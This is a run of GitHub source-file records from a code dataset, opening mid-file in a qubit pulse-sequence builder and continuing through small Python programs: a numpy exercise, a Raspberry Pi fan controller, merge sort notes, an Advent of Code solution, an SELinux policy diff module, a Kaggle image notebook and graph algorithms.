'ramsey':\n # flux_total_span = self.add_flux_pulses_hack(idx=ii, pulse_span_length = self.total_pulse_span_length_list[ii])\n\n else:\n flux_total_span = self.add_flux_pulses(pulse_span_length = self.total_pulse_span_length_list[ii])\n temp_seqs = self.psb.get_pulse_sequence() # also clears seq\n\n self.flux_pulse_span_list.append(flux_total_span)\n dummy = self.psb.get_total_flux_pulse_span_length()\n\n #print 'flux_pulse_span_list', self.flux_pulse_span_list\n\n self.pulse_sequence_matrix.append(temp_seq_matrix[ii] + temp_seqs) # concatenate hetero/flux pulse\n\n max_flux_length = round_samples( max(self.flux_pulse_span_list)+ 2 * self.psb.start_end_buffer)\n self.set_all_lengths(max(max_flux_length,max_length))\n\n print('max length =', max_length, 'ns')\n print('max flux length =', max_flux_length, 'ns')\n if max(max_flux_length,max_length) >= self.cfg[\"expt_trigger\"][\"period_ns\"]:\n print('Error!! Max sequence length larger than Exp period! ')\n print('flux_max_area_list = [', ', '.join(map(str, flux_max_area_list)), ']')\n print('flux_max_power_list = [', ', '.join(map(str, flux_max_power_list)), ']')\n\n # import csv\n # with open(r'C:\\slab_data_temp\\fast_flux_kernels\\flux_max_area.csv', 'a') as csvfile:\n # ww = csv.writer(csvfile, delimiter=',')\n # ww.writerow(map(str, flux_max_area_list))\n # csvfile.close()\n #\n # with open(r'C:\\slab_data_temp\\fast_flux_kernels\\flux_max_power.csv', 'a') as csvfile:\n # ww = csv.writer(csvfile, delimiter=',')\n # ww.writerow(map(str, flux_max_power_list))\n # csvfile.close()\n\n ###\n\n ###\n # heterodyne pulse - hack: max_length = 0\n if (self.name == 'vacuum_rabi') or (self.name[0:9] == 'histogram') :\n # vacuum_rabi : heterodyne pulses in SingleQubitPulseSeq\n #print 'skip adding heterodyne pulse in QubitPulseSeq'\n pass\n\n else:\n temp_seq_matrix = self.pulse_sequence_matrix[:]\n self.pulse_sequence_matrix = []\n self.add_heterodyne_pulses()\n #self.add_flux_pulses(length=500)\n temp_seqs = self.psb.get_pulse_sequence()\n\n # clears\n dummy = self.psb.get_total_pulse_span_length()\n dummy = self.psb.get_total_flux_pulse_span_length()\n\n for ii in range(len(self.expt_pts)+len(calibration_pts)):\n self.pulse_sequence_matrix.append(temp_seq_matrix[ii] + temp_seqs) # concatenate hetero/flux pulse\n ###\n\n\n def add_flux_pulses(self, pulse_span_length):\n\n #print pulse_span_length\n\n # this is to align flux pulse to readout? (diff in 2 pxdac cards)\n hw_delay = self.cfg['flux_pulse_info']['pxdac_hw_delay']\n\n if self.cfg['flux_pulse_info']['on_during_drive'] and self.cfg['flux_pulse_info']['on_during_readout']:\n\n flux_width = max(pulse_span_length + self.cfg['readout']['delay'] + self.cfg['readout']['width'] \\\n - self.cfg['flux_pulse_info']['flux_drive_delay'], 0)\n flux_comp_width = flux_width # self.cfg['flux_pulse_info']['dc_comp_pulse_length']\n flux_delay = self.cfg['flux_pulse_info']['flux_drive_delay'] + hw_delay\n flux_idle = 100.0\n\n elif (self.cfg['flux_pulse_info']['on_during_drive']) and (\n not self.cfg['flux_pulse_info']['on_during_readout']):\n\n flux_width = max(pulse_span_length - self.cfg['flux_pulse_info']['flux_drive_delay'], 0)\n flux_comp_width = flux_width # self.cfg['flux_pulse_info']['dc_comp_pulse_length']\n flux_delay = self.cfg['flux_pulse_info']['flux_drive_delay'] + hw_delay\n flux_idle = self.cfg['readout']['delay'] + self.cfg['readout']['width'] + 100\n\n elif (not self.cfg['flux_pulse_info']['on_during_drive']) and (\n self.cfg['flux_pulse_info']['on_during_readout']):\n\n flux_width = self.cfg['readout']['delay'] + self.cfg['readout']['width']\n flux_comp_width = flux_width # self.cfg['flux_pulse_info']['dc_comp_pulse_length']\n flux_delay = hw_delay + pulse_span_length\n flux_idle = 100.0\n\n else:\n flux_width = 0\n flux_comp_width = 0\n flux_delay = 0\n flux_idle = 0\n\n flux_a = self.cfg['flux_pulse_info']['flux_a']\n flux_freq = self.cfg['flux_pulse_info']['flux_freq']\n\n flux_mod_freq = self.cfg['flux_pulse_info']['flux_mod_freq']\n flux_mod_a = self.cfg['flux_pulse_info']['flux_mod_a']\n\n #print 'desired flux_width= ', flux_width, ', delay=', flux_delay\n\n flux_total_span_list = []\n for ii in range(8):\n\n flux_comp_a = - flux_a[ii] # flux_area/float(flux_comp_width)\n\n if flux_width > 0:\n self.psb.append('flux_'+str(ii), 'general', 'square', amp=flux_a[ii],\n length = flux_width, freq = flux_freq[ii],\n delay = flux_delay)\n\n # # hard rise/end for now\n # self.psb.append('flux_'+str(ii), 'general', 'linear_ramp_with_mod', start_amp=flux_a[ii],\n # stop_amp=flux_a[ii], length=flux_width, \\\n # mod_amp=flux_mod_a[ii], mod_freq=flux_mod_freq[ii], mod_start_phase=0.0, delay = flux_delay)\n\n if flux_comp_width > 0:\n self.psb.append('flux_' + str(ii), 'general', 'square', amp=flux_comp_a,\n length = flux_comp_width, freq = flux_freq[ii],\n delay = flux_delay + flux_idle)\n\n # also clears\n flux_total_span_list.append(self.psb.get_total_pulse_span_length())\n\n return max(flux_total_span_list)\n\n def add_flux_pulses_hack(self, idx, pulse_span_length):\n\n # only for ramsey fast flux scope\n\n if idx >= len(self.expt_pts):\n # cal pts\n return 0.0\n\n else:\n # this is to align flux pulse to readout? (diff in 2 pxdac cards)\n hw_delay = self.cfg['flux_pulse_info']['pxdac_hw_delay']\n\n flux_width = self.expt_cfg['flux_width']\n flux_comp_width = flux_width\n\n self.cfg['pulse_info']['square']['ramp_sigma'] = 0.0\n\n gap = 50\n flux_delay = self.cfg['pulse_info']['gauss']['half_pi_length']*4 + gap + hw_delay\n flux_idle = (pulse_span_length - flux_delay - flux_width) \\\n + self.cfg['readout']['delay'] + self.cfg['readout']['width'] + 100\n\n flux_a = self.cfg['flux_pulse_info']['flux_a']\n flux_freq = self.cfg['flux_pulse_info']['flux_freq']\n flux_mod_freq = self.cfg['flux_pulse_info']['flux_mod_freq']\n flux_mod_a = self.cfg['flux_pulse_info']['flux_mod_a']\n\n flux_total_span_list = []\n for ii in range(8):\n\n flux_comp_a = - flux_a[ii] # flux_area/float(flux_comp_width)\n\n if flux_width > 0:\n self.psb.append('flux_'+str(ii), 'general', 'square', amp=flux_a[ii],\n length = flux_width, freq = flux_freq[ii],\n delay = flux_delay)\n\n if flux_comp_width > 0:\n self.psb.append('flux_' + str(ii), 'general', 'square', amp=flux_comp_a,\n length = flux_comp_width, freq = flux_freq[ii],\n delay = flux_delay + flux_idle)\n\n # also clears\n flux_total_span_list.append(self.psb.get_total_pulse_span_length())\n\n return max(flux_total_span_list)\n\n def add_heterodyne_pulses(self, hetero_read_freq = None, hetero_a = None):\n\n # todo: seems to have bug here? not the same w/ or w/o hetero_read_freq & hetero_a\n # print hetero_read_freq\n if hetero_read_freq is not None:\n\n het_carrier_freq = hetero_read_freq - self.cfg['readout']['heterodyne_freq']\n het_read_freq_list = array([hetero_read_freq])\n if hetero_a is None:\n het_a_list = array([self.cfg['readout']['heterodyne_a']])\n else:\n het_a_list = array([hetero_a])\n het_IFreqList = het_read_freq_list - het_carrier_freq\n\n else:\n if self.cfg['readout']['is_multitone_heterodyne']:\n het_carrier_freq = self.cfg['readout']['heterodyne_carrier_freq']\n het_read_freq_list = array(self.cfg['readout']['heterodyne_freq_list'])\n het_a_list = array(self.cfg['readout']['heterodyne_a_list'])\n het_IFreqList = het_read_freq_list - het_carrier_freq\n else:\n het_carrier_freq = self.cfg['readout']['frequency'] - self.cfg['readout']['heterodyne_freq']\n het_read_freq_list = array([self.cfg['readout']['frequency']])\n het_a_list = array([self.cfg['readout']['heterodyne_a']])\n het_IFreqList = het_read_freq_list - het_carrier_freq\n\n # print('het_carrier_freq', het_carrier_freq)\n # print('het_read_freq_list', het_read_freq_list)\n # print('het_a_list', het_a_list)\n # print('het_IFreqList', het_IFreqList)\n\n het_phase_list = [(self.cfg['readout']['start_phase'] + self.cfg['readout']['phase_slope'] * ii )%360\n for ii in het_read_freq_list]\n # het_phase_list = [0.0 for ii in het_IFreqList]\n\n if sum(het_a_list) > 1:\n print('Warning! Sum of heterodyne amplitudes > 1 in QubitPulseSequence.')\n\n if not self.cfg['readout']['is_fast_awg']:\n\n for ii in range(len(het_IFreqList)):\n # q2 pulses are hacked to be fixed in time, so can append multiple pulses for heterodyne readout\n self.psb.append('hetero', 'general', 'square', amp= het_a_list[ii],\n length=self.cfg['readout']['width'],\n freq= het_IFreqList[ii],\n phase=het_phase_list[ii],\n delay=self.cfg['readout']['width']/2.0 + self.cfg['readout']['delay'])\n else:\n\n # heterodyne carrier - LO\n self.psb.append('hetero_carrier', 'general', 'square', amp=self.cfg['readout']['hetero_carrier_a'],\n length=self.cfg['readout']['width'],\n freq=het_carrier_freq,\n delay=self.cfg['readout']['width'] / 2.0 + self.cfg['readout']['delay'])\n if self.cfg['readout']['is_hetero_phase_ref']:\n # hetero phase reference to solve alazar jitter\n self.psb.append('hetero_carrier', 'general', 'square', amp=self.cfg['readout']['hetero_phase_ref_a'],\n length=self.cfg['readout']['width'],\n freq=self.cfg['readout']['hetero_phase_ref_freq'],\n delay=self.cfg['readout']['width'] / 2.0 + self.cfg['readout']['delay'])\n # fast awg: read_freq\n for ii in range(len(het_IFreqList)):\n # pulses are hacked to be fixed in time, so can append multiple pulses for heterodyne readout\n self.psb.append('hetero', 'general', 'square', amp= het_a_list[ii],\n length=self.cfg['readout']['width'],\n freq=het_read_freq_list[ii],\n phase=het_phase_list[ii],\n delay=self.cfg['readout']['width'] / 2.0 + self.cfg['readout']['delay'])\n\n def build_sequence(self):\n\n PulseSequence.build_sequence(self)\n\n self.waveforms_dict = {}\n self.waveforms_tpts_dict = {}\n\n for awg in self.awg_info:\n for waveform in awg['waveforms']:\n self.waveforms_dict[waveform['name']] = self.waveforms[waveform['name']]\n self.waveforms_tpts_dict[waveform['name']] = self.get_waveform_times(waveform['name'])\n\n start_time = time.time()\n print('\\nStart building sequences...(QubitPulseSequence.py)')\n\n self.psb.prepare_build(self.waveforms_tpts_dict,self.waveforms_dict)\n\n generated_sequences = self.psb.build(self.pulse_sequence_matrix,self.total_flux_pulse_span_length_list)\n self.waveforms_dict = generated_sequences\n\n for waveform_key in self.waveforms_dict:\n self.waveforms[waveform_key] = self.waveforms_dict[waveform_key]\n\n end_time = time.time()\n print('Finished building sequences in', end_time - start_time, 'seconds.\\n')\n\n # np.save('S:\\\\_Data\\\\160711 - Nb Tunable Coupler\\\\data\\\\waveform.npy',self.waveforms['qubit drive Q'])\n ### in ipython notebook: call np.load('file_path/file_name.npy')\n\n if self.cfg[\"visdom_plot_seq\"]:\n\n print('Plotting sequences in Visdom...')\n print('Plot seq list (cfg):', self.cfg[\"visdom_plot_seq_list\"])\n\n viz = visdom.Visdom()\n assert viz.check_connection(), \"Visdom server not connected!\"\n # added two environments \"seq_builder.json\", and \"live_plot.json\" in C:\\Users\\slab\\.visdom\n eid = \"seq_builder\"\n viz.close(win=None, env=eid)\n\n for sequence_id in self.cfg[\"visdom_plot_seq_list\"]: #range(len(self.pulse_sequence_matrix)):\n\n win = viz.line(\n X=np.arange(0, 1),\n Y=np.arange(0, 1),\n env=eid,\n opts=dict( height=750, width=1800, title='Seq #%d' % sequence_id, showlegend=True, xlabel='Time to origin (ns)'))\n\n for waveform_key in self.waveforms_dict:\n\n viz.updateTrace(\n X= self.waveforms_tpts_dict[waveform_key] - self.psb.origin,\n Y= self.waveforms_dict[waveform_key][sequence_id] ,\n env=eid, win = win, name = waveform_key, append = False)\n\n\n def reshape_data(self, data):\n return np.reshape(data, (self.sequence_length, self.waveform_length))","repo_name":"SchusterLab/slab","sub_path":"slab/experiments/Alex/ExpLib/QubitPulseSequence.py","file_name":"QubitPulseSequence.py","file_ext":"py","file_size_in_byte":18355,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"42812305270","text":"# Importamos numpy\nimport numpy as np\n\n# Ejercicio 4\ndef ex4_jonathan_valle():\n ## Generar numeros de 0 a 80 con una dimension de 4x3\n a = np.random.randint(81, size=(4,3))\n # Cambiar la matriz de 4x3 por 3x4\n b = a.reshape(3,4)\n # Eliminar la ultima columna de la matriz (axis=1) para indicar que es columna\n c = np.delete(b, 3, axis=1)\n # Obtenemos la ultima fila\n i = c[-1,-1]\n # Insertamos la fila obtenida a la ultima columna\n fila = np.insert(c, 3, i, axis=1)\n # Al retornar varios resultados, lo ponemos dentro de un parantesis y con una coma\n return (a, b, c, fila)\nex4_jonathan_valle()\n","repo_name":"jgimenezbalmes/M7_UF2_practica9","sub_path":"exercici4_jonathanValle.py","file_name":"exercici4_jonathanValle.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16463015605","text":"\n\nimport RPi.GPIO as GPIO\nimport time\nimport datetime\nimport pytz\n\nfrom threading import Thread\nimport _thread\nimport serial\n\nfanPin = 23\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(fanPin, GPIO.OUT)\n\nfanState = False\nGPIO.output(fanPin, GPIO.LOW)\n\ndef turnOnFan():\n global fanState\n GPIO.output(fanPin, GPIO.HIGH)\n fanState = True \n print(\"turn on fan\") \n \ndef turnOffFan():\n global fanState\n GPIO.output(fanPin, GPIO.LOW)\n fanState = False\n print(\"turn off fan\") \n\n\ndef get_cpu_temperature():\n try:\n tFile = open('/sys/class/thermal/thermal_zone0/temp')\n temp = float(tFile.read())\n tFile.close()\n tempC = temp/1000\n #print(tempC)\n return tempC\n except:\n tFile.close()\n GPIO.cleanup()\n\n\ndef fanAndTempLOOP():\n while True:\n if(fanState == False):\n if(get_cpu_temperature() > 50):\n turnOnFan()\n if(fanState == True):\n if(get_cpu_temperature() < 45):\n turnOffFan()\n time.sleep(1)\n \n_thread.start_new_thread(fanAndTempLOOP, ())","repo_name":"qtechdesign/qtech","sub_path":"FPS/tools/firmware/qtech-lora-gateway/lib_fanAndTemp.py","file_name":"lib_fanAndTemp.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26996738101","text":"def mergeSort(arr):\n\t# 归并\n\tdef merge(left, right):\n\t\tresult = []\n\t\ti = j = 0\n\t\twhile i < len(left) and j < len(right):\n\t\t\tif left[i] <= right[j]:\n\t\t\t\tresult.append(left[i])\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tresult.append(right[j])\n\t\t\t\tj += 1\n\t\tresult = result + left[i:] + right[j:] # 剩余的元素直接添加至末尾\n\t\treturn result\n\t# 递归\n\tif len(arr) <= 1:\n\t\treturn arr\n\tmid = len(arr) // 2\n\tleft = mergeSort(arr[:mid])\n\tright = mergeSort(arr[mid:])\n\treturn merge(left, right)\n\n\n# # 算法导论,可以运行,但未测试\ndef merge(A, p, q, r):\n\tN1 = A[p : q+1]\n\tN2 = A[q+1 : r+1]\n\tpointer = p\n\twhile N1 and N2:\n\t\tif N1[0] <= N2[0]:\n\t\t\tA[pointer] = N1.pop(0)\n\t\telse:\n\t\t\tA[pointer] = N2.pop(0)\n\t\tpointer += 1\n\ttail = N1 if N1 else N2 # 落单的那个\n\tfor last in tail:\n\t\tA[k] = last\n\t\tpointer += 1\n\ndef mergesort(A, p, r):\n\tif p < r:\n\t\tmid = (p+r-1) // 2\n\t\tmergesort(A, p, mid)\n\t\tmergesort(A, mid+1, r)\n\t\tmerge(A, p, q, r)\n","repo_name":"hookeyplayer/exercise.io","sub_path":"算法/笔记03_归并排序.py","file_name":"笔记03_归并排序.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72956235895","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport sys\nimport os\nimport subprocess\nfrom six import string_types\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport scipy\nfrom skimage import io\nfrom scipy import ndimage\nfrom IPython.display import display\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom spectral import imshow\n\n\n\n\nget_ipython().system('ls -lha ../input')\n\n\n\n\nget_ipython().system('ls -lha ../input/test-tif-v2 | wc -l')\n\n\n\n\nPLANET_KAGGLE_ROOT = os.path.abspath(\"../input/\")\nPLANET_KAGGLE_JPEG_DIR = os.path.join(PLANET_KAGGLE_ROOT, 'train-jpg')\nPLANET_KAGGLE_LABEL_CSV = os.path.join(PLANET_KAGGLE_ROOT, 'train_v2.csv')\nassert os.path.exists(PLANET_KAGGLE_ROOT)\nassert os.path.exists(PLANET_KAGGLE_JPEG_DIR)\nassert os.path.exists(PLANET_KAGGLE_LABEL_CSV)\n\n\n\n\nlabels_df = pd.read_csv(PLANET_KAGGLE_LABEL_CSV)\nlabels_df.head()\n\n\n\n\n# Build list with unique labels\nlabel_list = []\nfor tag_str in labels_df.tags.values:\n labels = tag_str.split(' ')\n for label in labels:\n if label not in label_list:\n label_list.append(label)\n\n\n\n\n# Add onehot features for every label\nfor label in label_list:\n labels_df[label] = labels_df['tags'].apply(lambda x: 1 if label in x.split(' ') else 0)\n# Display head\nlabels_df.head()\n\n\n\n\n# Histogram of label instances\nlabels_df[label_list].sum().sort_values().plot.bar()\n\n\n\n\ndef make_cooccurence_matrix(labels):\n numeric_df = labels_df[labels]; \n c_matrix = numeric_df.T.dot(numeric_df)\n sns.heatmap(c_matrix)\n return c_matrix\n\n# Compute the co-ocurrence matrix\nmake_cooccurence_matrix(label_list)\n\n\n\n\nweather_labels = ['clear', 'partly_cloudy', 'haze', 'cloudy']\nmake_cooccurence_matrix(weather_labels)\n\n\n\n\nland_labels = ['primary', 'agriculture', 'water', 'cultivation', 'habitation']\nmake_cooccurence_matrix(land_labels)\n\n\n\n\nrare_labels = [l for l in label_list if labels_df[label_list].sum()[l] < 2000]\nmake_cooccurence_matrix(rare_labels)\n\n\n\n\ndef sample_images(tags, n=None):\n \"\"\"Randomly sample n images with the specified tags.\"\"\"\n condition = True\n if isinstance(tags, string_types):\n raise ValueError(\"Pass a list of tags, not a single tag.\")\n for lbl in label_list:\n if lbl in tags:\n condition = condition & (labels_df[lbl] == 1)\n else:\n condition = condition & (labels_df[lbl] == 0)\n if n is not None:\n return labels_df[condition].sample(n)\n else:\n return labels_df[condition]\n\n\n\n\nsample_images(['clear','primary'], n=10)\n\n\n\n\ndef load_image(filename):\n '''Look through the directory tree to find the image you specified\n (e.g. train_10.tif vs. train_10.jpg)'''\n for dirname in os.listdir(PLANET_KAGGLE_ROOT):\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, dirname, filename))\n if os.path.exists(path):\n #print('Found image {}'.format(path))\n return io.imread(path)\n # if you reach this line, you didn't find the image you're looking for\n print('Load failed: could not find image {}'.format(path))\n \ndef sample_to_fname(sample_df, row_idx, suffix='tif'):\n '''Given a dataframe of sampled images, get the\n corresponding filename.'''\n fname = sample_df.get_value(sample_df.index[row_idx], 'image_name')\n return '{}.{}'.format(fname, suffix)\n\ndef display_sample_im(tags, n=None):\n s = sample_images(tags, n=n)\n if n is None:\n n=0\n for i in range(n):\n fname = sample_to_fname(s.iloc[i], 0)\n rgbn_image = load_image(fname)\n imshow(rgbn_image[:,:,:3])\n return rgbn_image, s\n \n \n\n\n\n\nim, s = display_sample_im(['primary', 'clear'], n=4);\ns\n\n\n\n\nim_m = np.vstack([im[i*16:(i+1)*16,j*16:(j+1)*16,0].ravel() for i in range(16) for j in range(16)])\ncov = np.cov(im_m)\neigen_value, eigen_vector = np.linalg.eig(cov)\neigen_value = eigen_value.reshape(-1,1)\nsignificance_ind = eigen_value.argsort(axis=0)[::-1]\neigen_value[significance_ind[:,0]]\n# The n_th eigen vector\nn = 0\ni = significance_ind[n,0]\nfeature = eigen_vector[:,i:i+1].T\nfinaldata = np.dot(feature,im_m).T\nfirst_eigen_image = np.dot(feature.T,finaldata.T).T\nplt.imshow(im[0:16,0:16,0]);\nplt.figure()\nplt.imshow(finaldata.reshape(16,16));\nplt.figure()\nplt.imshow(first_eigen_image)\n\n\n\n\ndef calibrate_image(rgb_image):\n ref_stds = [41.262260630543992, 35.759466445746916, 33.383302346657047]\n ref_means = [80.198569793701168, 87.701977996826173, 76.552578582763672]\n \n # Transform test image to 32-bit floats to avoid \n # surprises when doing arithmetic with it \n calibrated_img = rgb_image.copy().astype('float32')\n\n # Loop over RGB\n for i in range(3):\n # Subtract mean \n calibrated_img[:,:,i] = calibrated_img[:,:,i]-np.mean(calibrated_img[:,:,i])\n # Normalize variance\n calibrated_img[:,:,i] = calibrated_img[:,:,i]/np.std(calibrated_img[:,:,i])\n # Scale to reference \n calibrated_img[:,:,i] = calibrated_img[:,:,i]*ref_stds[i] + ref_means[i]\n # Clip any values going out of the valid range\n calibrated_img[:,:,i] = np.clip(calibrated_img[:,:,i],0,255)\n\n # Convert to 8-bit unsigned int\n return calibrated_img.astype('uint8')\n\n\n\n\n\n\n","repo_name":"aorursy/lost-nb","sub_path":"bastiaanbergman_getting-started-with-the-data.py","file_name":"bastiaanbergman_getting-started-with-the-data.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2616794660","text":"from collections import defaultdict, namedtuple\n\nfrom ..policyrep import MLSRuletype\nfrom .descriptors import DiffResultDescriptor\nfrom .difference import Difference, SymbolWrapper, Wrapper\nfrom .mls import RangeWrapper\n\n\nmodified_mlsrule_record = namedtuple(\"modified_mlsrule\", [\"rule\",\n \"added_default\",\n \"removed_default\"])\n\n\nclass MLSRulesDifference(Difference):\n\n \"\"\"Determine the difference in MLS rules between two policies.\"\"\"\n\n added_range_transitions = DiffResultDescriptor(\"diff_range_transitions\")\n removed_range_transitions = DiffResultDescriptor(\"diff_range_transitions\")\n modified_range_transitions = DiffResultDescriptor(\"diff_range_transitions\")\n\n # Lists of rules for each policy\n _left_mls_rules = defaultdict(list)\n _right_mls_rules = defaultdict(list)\n\n def diff_range_transitions(self):\n \"\"\"Generate the difference in range_transition rules between the policies.\"\"\"\n\n self.log.info(\n \"Generating range_transition differences from {0.left_policy} to {0.right_policy}\".\n format(self))\n\n if not self._left_mls_rules or not self._right_mls_rules:\n self._create_mls_rule_lists()\n\n added, removed, matched = self._set_diff(\n self._expand_generator(self._left_mls_rules[MLSRuletype.range_transition],\n MLSRuleWrapper),\n self._expand_generator(self._right_mls_rules[MLSRuletype.range_transition],\n MLSRuleWrapper))\n\n modified = []\n\n for left_rule, right_rule in matched:\n # Criteria for modified rules\n # 1. change to default range\n if RangeWrapper(left_rule.default) != RangeWrapper(right_rule.default):\n modified.append(modified_mlsrule_record(left_rule,\n right_rule.default,\n left_rule.default))\n\n self.added_range_transitions = added\n self.removed_range_transitions = removed\n self.modified_range_transitions = modified\n\n #\n # Internal functions\n #\n def _create_mls_rule_lists(self):\n \"\"\"Create rule lists for both policies.\"\"\"\n # do not expand yet, to keep memory\n # use down as long as possible\n self.log.debug(\"Building MLS rule lists from {0.left_policy}\".format(self))\n for rule in self.left_policy.mlsrules():\n self._left_mls_rules[rule.ruletype].append(rule)\n\n self.log.debug(\"Building MLS rule lists from {0.right_policy}\".format(self))\n for rule in self.right_policy.mlsrules():\n self._right_mls_rules[rule.ruletype].append(rule)\n\n self.log.debug(\"Completed building MLS rule lists.\")\n\n def _reset_diff(self):\n \"\"\"Reset diff results on policy changes.\"\"\"\n self.log.debug(\"Resetting MLS rule differences\")\n self.added_range_transitions = None\n self.removed_range_transitions = None\n self.modified_range_transitions = None\n\n # Sets of rules for each policy\n self._left_mls_rules.clear()\n self._right_mls_rules.clear()\n\n\nclass MLSRuleWrapper(Wrapper):\n\n \"\"\"Wrap MLS rules to allow set operations.\"\"\"\n\n __slots__ = (\"ruletype\", \"source\", \"target\", \"tclass\")\n\n def __init__(self, rule):\n self.origin = rule\n self.ruletype = rule.ruletype\n self.source = SymbolWrapper(rule.source)\n self.target = SymbolWrapper(rule.target)\n self.tclass = SymbolWrapper(rule.tclass)\n self.key = hash(rule)\n\n def __hash__(self):\n return self.key\n\n def __lt__(self, other):\n return self.key < other.key\n\n def __eq__(self, other):\n # because MLSRuleDifference groups rules by ruletype,\n # the ruletype always matches.\n return self.source == other.source and \\\n self.target == other.target and \\\n self.tclass == other.tclass\n","repo_name":"TresysTechnology/setools","sub_path":"setools/diff/mlsrules.py","file_name":"mlsrules.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"22"} +{"seq_id":"28164529050","text":"def read_file(file_name: str, what=None) -> dict:\n res = {}\n with open(file_name) as fp:\n for line in fp:\n split = line.split(\";\")\n if split[0] == \"id\":\n continue\n if what == None:\n res[int(split[0])] = [int(nb) for nb in split[1:]]\n elif what == \"students\":\n res[int(split[0])] = split[1] + \" \" + split[2].strip()\n return res\n\n\ndef get_final_grade(points: int) -> int:\n values = [14, 17, 20, 23, 27]\n for i in range(5):\n if points <= values[i]:\n return i\n return 5\n\n\nstudent_file = input(\"Student information: \")\nexercises_file = input(\"Exercises completed: \")\nexam_file = input(\"Exam points: \")\ncourse_file = input(\"Course information: \")\nwith open(\"course1.txt\") as course_file:\n course = course_file.readline().split(\":\")[1].strip()\n print(course)\n credits = int(course_file.readline().split(\":\")[1])\nwith open(\"results.txt\", \"w\") as res_txt, open(\"results.csv\", \"w\") as res_csv:\n header = f\"{course}, {credits} credits\"\n res_txt.write(f\"{header}\\n{'=' * len(header)}\\n\")\n headers = [\"name\", \"exec_nbr\", \"exec_pts.\",\n \"exm_pts.\", \"tot_pts.\", \"grade\"]\n res_txt.write(f\"{headers[0]:30}\")\n res_txt.write(\"\".join(f\"{header:10}\" for header in headers[1:]))\n for id, name in read_file(student_file, \"students\").items():\n exerc = sum(read_file(exercises_file)[id])\n exams = sum(read_file(exam_file)[id])\n res_txt.write(f\"\\n{name:30}{exerc:<10}{exerc//4:<10}{exams:<10}\"\n f\"{exerc//4 + exams:<10}\"\n f\"{get_final_grade(exerc//4 + exams):<10}\")\n res_csv.write(f\"{id};{name};{get_final_grade(exerc//4 + exams)}\\n\")\nprint(\"Results written to files results.txt and results.csv\")\n","repo_name":"P10r10/Python-Programming-Week-6","sub_path":"course_grading_part_4.py","file_name":"course_grading_part_4.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"17707148759","text":"# 조건\n\"\"\"\n1. 프로그램 실행 시간을 1/1000초 단위로 계산하기 # ms로 계산하라는 의미\n2. datetime 모듈을 사용하기\n3. datetime 모듈의 datetime 객체를 임포트하여 사용하기\n4. ret 변수에 1부터 백만까지 더한 결과를 담을 변수로 사용한다.\n5. 1부터 백만까지의 더하는 루틴은 for 문을 사용한다.\n6. 1에서부터 백만까지 더한 결과를 화면에 print를 통해 출력한다.\n7. 결과\n 1부터 백만까지 더합니다.\n 1부터 백만까지 더한 결과 : 499999500000 # 백만까지 더한게 아니라 99만9999까지 더한 값\n 총 계산 시간 : 0:00:00.124968\n 총 계산 시간 : 124ms\n\"\"\"\n\nfrom datetime import datetime\n\nret = 0\n\nfor i in range(1,1000000) :\n if i == 1 :\n print(\"1부터 백만까지 더합니다.\")\n start = datetime.now()\n ret += i\n if i == 999999 :\n end = datetime.now() - start\n print(\"1부터 백만까지 더한 결과 : {}\".format(ret))\n print(\"총 계산 시간 : {}\".format(end))\n print(\"총 계산 시간 : {}ms\".format(round(end.microseconds*0.001)))","repo_name":"GyuminGomin/Python-study","sub_path":"01.Python program coding/01~10/03.1부터 백만까지 더하는 프로그램 실행 시간 계산하기.py","file_name":"03.1부터 백만까지 더하는 프로그램 실행 시간 계산하기.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2979998463","text":"file = open(\"Day10.txt\")\n\ndata = []\nfor line in file:\n val = int(line[:-1])\n data.append(val)\n\ndata.sort()\ndata.append(max(data)+3)\n\nlast = 0\n_1count = 0\n_3count = 0\nfor d in data:\n if (d - last == 1): _1count += 1\n elif (d - last == 3): _3count += 1\n else: print (\"!!!\")\n last = d\n\nprint (f\"1-diff: {_1count}\")\nprint (f\"3-diff: {_3count}\")\nprint (_3count * _1count)\n","repo_name":"RexTremendae/AdventOfCode","sub_path":"archive/Source/2020/Day10_1.py","file_name":"Day10_1.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"999058336","text":"'''A collection of graph algorithms\n\nCurrently assumes directed graphs.\n'''\n\nfrom collections import deque\n\ndef floyd_warshall(graph):\n '''All-pairs shortest paths\n '''\n pass\n\ndef bfs(graph, source, sink):\n '''Return a list of edges from source to sink, or None.\n \n Requires\n graph.children\n edge labels\n '''\n queue = deque([source])\n prevs = {source: None}\n\n while queue:\n cur = queue.popleft()\n if cur == sink:\n break\n for b in graph.children(cur):\n if b not in prevs:\n prevs[b] = cur\n queue.append(b)\n else:\n return None\n\n path, here = [], sink\n while here != source:\n path.append((prevs[here], here))\n here = prevs[here]\n return list(reversed(path))\n\n\ndef max_flow(graph, source, sink):\n '''Max flow of digraph\n \n Requires\n digraph.copy\n digraph.children\n edge labels\n '''\n resid = graph.copy()\n total_flow = 0\n\n while True:\n path = bfs(resid, source, sink)\n if path is None:\n break\n\n flow = min(resid[a:b] for a, b in path)\n\n for a, b in path:\n if (b, a) not in resid.edges():\n resid[b:a] = 0\n resid[a:b] -= flow\n 